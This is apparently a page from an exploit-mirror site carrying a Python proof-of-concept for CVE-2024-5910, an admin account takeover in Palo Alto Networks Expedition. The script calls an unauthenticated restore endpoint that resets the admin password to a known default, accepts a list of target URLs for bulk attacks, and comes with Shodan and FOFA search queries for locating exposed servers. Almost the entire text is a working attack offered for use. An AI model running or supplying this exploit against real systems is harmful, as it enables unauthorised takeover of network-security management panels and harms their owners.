扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover # Shodan Dork: html:"expedition project"# # FOFA Dork: "expedition project" && icon_hash="1499876150" # # Exploit Author: ByteHunter# # Email: 0xByteHunter@proton.me # # Vulnerable Versions: 1.2 < 1.2.92 # # Tested on: 1.2.90.1 & 1.2.75# # CVE : CVE-2024-5910 # ############################ # ################################################################################################ import requests import argparse import warnings from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter("ignore", InsecureRequestWarning) ENDPOINT = '/OS/startup/restore/restoreAdmin.php' def send_request(base_url): url = f"{base_url}{ENDPOINT}" print(f"Testing URL: {url}") try: response = requests.get(url, verify=False, timeout=7) if response.status_code == 200: print("✓ Admin password restored to: 'paloalto'\n") print("✓ admin panel is now accessable via ==> admin:paloalto creds") else: print(f"Request failed with status code: {response.status_code}\n") except requests.exceptions.RequestException as e: print(f"Error sending request to {url}") #{e} def main(): parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC') parser.add_argument('-u', '--url', type=str, help='single target URL') parser.add_argument('-l', '--list', type=str, help='URL target list') args = parser.parse_args() if args.url: send_request(args.url) elif args.list: try: with open(args.list, 'r') as file: urls = file.readlines() for base_url in urls: send_request(base_url.strip()) except FileNotFoundError: print(f"File not found: {args.list}") else: print("I need a URL address with -u or a URL file list with -l.") if __name__ == '__main__': main() |
体验盒子
